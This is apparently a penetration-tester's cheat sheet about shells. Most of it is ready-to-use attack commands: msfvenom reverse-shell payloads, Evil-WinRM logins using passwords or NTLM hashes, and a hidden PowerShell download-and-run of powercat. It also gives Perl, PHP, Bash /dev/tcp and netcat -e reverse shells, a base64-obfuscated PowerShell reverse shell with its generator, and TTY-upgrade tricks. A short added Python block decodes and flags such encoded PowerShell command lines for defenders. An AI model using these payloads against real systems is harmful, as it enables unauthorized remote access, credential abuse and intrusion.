Shells
Listener
rlwrap -cAr nc -lnvp <Port Number>
Web Shells
Locate and upload an appropriate shell from /usr/share/webshells
Reverse Shells
Refer to https://www.revshells.com/
Reverse Shells (MSFvenom)
NOTE:
shell/reverse_tcp = staged payload
shell_reverse_tcp = unstaged payload
A staged payload requires a Metasploit listener (multi/handler); an unstaged payload works with a plain netcat listener
Linux
Windows
SunOS (Solaris)
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
Web-based Payloads
PHP
ASP[X]
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f war > reverse.war
NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port>
Script Language Payloads
Evil-WinRM
NOTE:
Verify usability with: crackmapexec winrm <Target IP>
Look for port 5985 in nmap scans
evil-winrm -i <Target IP Address> -u <Username> -p <Password>
evil-winrm -i <Target IP Address> -u <Username> -H <NTLM Hash>
Powercat.ps1
powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP Address>/powercat.ps1')
powercat -c <Kali IP Address> -p <Kali Port> -e powershell
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.pl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP Address>:<Kali Port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.py
PHP
<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
php -r '$sock=fsockopen("<Kali IP Address>",<Kali Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Bash
NOTE: Create a .sh file and paste the following
#!/bin/bash
/bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1"
Netcat
Linux
nc -nv <Kali IP Address> <Kali Port> -e /bin/bash
nc -nv <Kali IP Address> <Kali Port> -e /bin/sh
nc -nv <Kali IP Address> <Kali Port> -c /bin/bash
nc -nv <Kali IP Address> <Kali Port> -c /bin/sh
Windows
nc64.exe <Kali IP Address> <Kali Port> -e cmd
nc64.exe <Kali IP Address> <Kali Port> -e powershell
nc64.exe <Kali IP Address> <Kali Port> -t -e cmd
nc64.exe <Kali IP Address> <Kali Port> -t -e powershell
PowerShell
Do the following in Kali's pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>", <Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
Alternatively, create the following Python script and run it (it produces the same -e argument as the pwsh snippet above)
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# powershell -e expects the script as base64 of UTF-16LE text with no byte-order mark;
# encoding with 'utf-16le' directly avoids the BOM that 'utf16' prepends
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()
print(cmd)
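From the defender's side, the same encoding is what an analyst has to undo when this command line shows up in process-creation logs. The following Python is an added example (not part of the original notes) that decodes the -e argument of a recorded powershell command line and flags the socket-plus-iex pattern of the one-liner above; the indicator list, the TEST-NET address and the sample command lines are constructed for this example.

```python
import base64

# Indicators taken from the one-liner above: a raw TCP socket plus in-memory
# evaluation of whatever the socket delivers. Constructed list for this example.
INDICATORS = ("System.Net.Sockets.TCPClient", "GetStream()", "iex ", "Invoke-Expression")


def decode_encoded_command(cmdline):
    """Return the script carried by a `powershell ... -e <base64>` command line, or None."""
    args = cmdline.split()
    for i, arg in enumerate(args[:-1]):
        # powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...)
        opt = arg[1:].lower()
        if arg[:1] in "-/" and opt and "encodedcommand".startswith(opt):
            try:
                raw = base64.b64decode(args[i + 1], validate=True)
            except ValueError:
                return None
            # Same encoding the generator uses: UTF-16LE without a byte-order mark
            return raw.decode("utf-16le", errors="replace")
    return None


def reverse_shell_indicators(script):
    """Return the indicator substrings found in the decoded script (case-insensitive)."""
    lowered = script.lower()
    return [ind for ind in INDICATORS if ind.lower() in lowered]


def analyse_cmdline(cmdline):
    """Summarise one process command line: was it encoded, and which indicators appear."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "indicators": []}
    return {"encoded": True, "indicators": reverse_shell_indicators(script)}


# Constructed samples: the opening statements of the one-liner above (TEST-NET address,
# not a working shell), encoded as the generator does, beside a benign encoded command.
SAMPLE_SCRIPT = ('$client = New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444);'
                 '$stream = $client.GetStream();iex $data')
SAMPLE_CMDLINE = "powershell -nop -w hidden -e " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()
BENIGN_CMDLINE = "powershell -e " + base64.b64encode("Get-Date".encode("utf-16le")).decode()

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(analyse_cmdline(line))
```

Feeding real process-creation events (e.g. Sysmon Event ID 1 CommandLine fields) through analyse_cmdline gives a quick triage signal; anything that decodes to a socket plus iex deserves a look regardless of the other flags.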
TTY Shell
NOTE: Sometimes a reverse shell is not fully functional (no job control, no tab completion, Ctrl-C kills it). The following commands spawn a proper TTY shell.
Python
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
Bash
echo os.system('/bin/bash')
/bin/sh -i
/bin/bash -i
script -qc /bin/bash /dev/null
Perl
perl -e 'exec "/bin/sh";'
exec "/bin/sh";
Ruby
exec "/bin/sh"
Lua
os.execute('/bin/sh')
IRB
exec "/bin/sh"
Vi
:!bash
:set shell=/bin/bash:shell
Nmap (interactive mode)
!sh